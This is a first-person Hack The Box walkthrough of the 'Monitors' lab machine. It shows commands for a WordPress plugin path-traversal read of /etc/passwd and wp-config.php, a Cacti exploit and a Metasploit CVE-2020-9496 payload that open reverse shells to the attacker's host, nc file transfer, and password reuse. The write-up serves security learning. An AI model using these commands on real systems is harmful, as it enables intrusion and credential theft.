Monitors Walkthrough — Hackthebox

Ahmed Rabeaa Mosaa (SadC0d3r)

8 min readSep 18, 2021

Hi guy My Name is Ahmed (SadC0d3r)

To day i will solve Monitors machine

OS : Linux
Difficulty : Hard
Ip : 10.10.10.238

Let’s Start

i will nmap the target but i didn’t get unnormal port is opened
the ports is opened is 22 and 80

When I go to the Ip i see this this message

so i go to /etc/hosts and add the ip with host name

then go tho the domain monitors.htb

now i want get info about the site
when i saw the index page i see this line

and In wappalyzer addon i identify the web technology

It used wordpress version 5.5.1

Now i use wpscan tool to get more info about the site and know the if exist thing vulnerable or not

sudo wpscan — url http://monitors.htb/ — api-token XYZ -e vp,vt

This command it will be scan the site and enumerate all plugins and themes may be vulnerable

The result is big but the important thing is

i will go to the exploit-db url is displayed on screen and i get the vulnerable endpoint

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Done it worked and i get user name marcus i try get ssh key by this path
/home/marcus/.ssh/id_rsa but i can’t

then i read wp-config.php

Great i get the DB connection info

i tried get RCE from LFI by several methods but failed and try use the DB password with username Marcus but failed again

so i get list of LFI paths and send the request to intruder and i use the paths list

All content length with 166 this is meaning nothing is returned
i will click to the length tap to changing the sorting method

After opened some of response i found thing maybe important in this path
/etc/apache2/sites-enabled/000-default.conf

i found this subdomain i go to it
i can’t because i should add this subdomain to machine ip in /etc/hosts

and then go to the subdomain

how i login without know any credential

i have username and password {marcus, DB password} but i still i can’t login
i tried user the username is admin

Yessss… i logged in

this is first time see this CMS so i didn’t know how exploit or use it so i go to about page and saw the version and go to Goolge to make some searching to exploit it

CMS name : Cacti
Version : 1.2.12

i found this exploit
https://www.exploit-db.com/exploits/49810

i downloaded it and start to use it

this is options to use the exploit

Take care you should run listener before run the exploit code
nc -vlp 4444

and now run the exploit code
python exx.py -t http://cacti-admin.monitors.htb -u admin -p BestAdministrator@2020! — lhost 10.10.16.64 — lport 4444

Exploit is completed and lets check the listener

yes i get the RCE

Run this command to get spawn shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

and i will go to /home to try get the user
i will use the DB password to try get the marcus user but i can’t

i found some of file but i can’t read any file so i will run this command

grep ‘marcus’ /etc -R 2>/dev/null

to get all file didn’t have binaries

i found this script so i will read it by this command

cat /home/marcus/.backup/backup.sh

i found pass i will try to use it to get marcus user

Great i get marcus user and read the user flag

now i will connect with ssh to more comfortable shell

ssh marcus@10.10.10.238

ok … now i saw file called note.txt
lets see it

this is comment told the docker should be updated but it still not

ok i will install on the server the linpeas script to scan anyprivilege escalation potential

but i facing a problem the server doesn’t have wget or curl
but after do some of searching i found method by nc

in our attack box write this command
nc -lvp 5555 < rootv2.sh
rootv2.sh is a leanpeas script

in server write this command
nc 10.10.16.64 4444 > rootv2.sh

ok lets give the script execute permeation by this commmand
chmod +x rootv2.sh
and run the script
./rootv2.sh -a

After the tool finished i take time to review the result

Port 8433 is a default port in apache tomcat so i want open the service it working in this port but if you put the monitors.htb:8443 you didn’t can get the service mmm this is a proxy then i will do port forwarding ssh tunnling

ssh -L 8443:127.0.0.1:8443 marcus@10.10.10.238

Ok i accessed the service and detected the version of tomcat
Version : 9.0.31

lets go to the google and search for exploit for this version

I spent too much time to searching and testing and finally i got the right exploit

CVE-2020–9496
https://sploitus.com/exploit?id=PACKETSTORM:161769

Now i will use metasploit to exploit

write those command

msfconsole

search CVE-2020–9496

then use the exploit by this command
use 0

Now write options to setup the exploit
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.16.64
set RHOSTS 127.0.0.1
set FORCEEXPLOIT true
run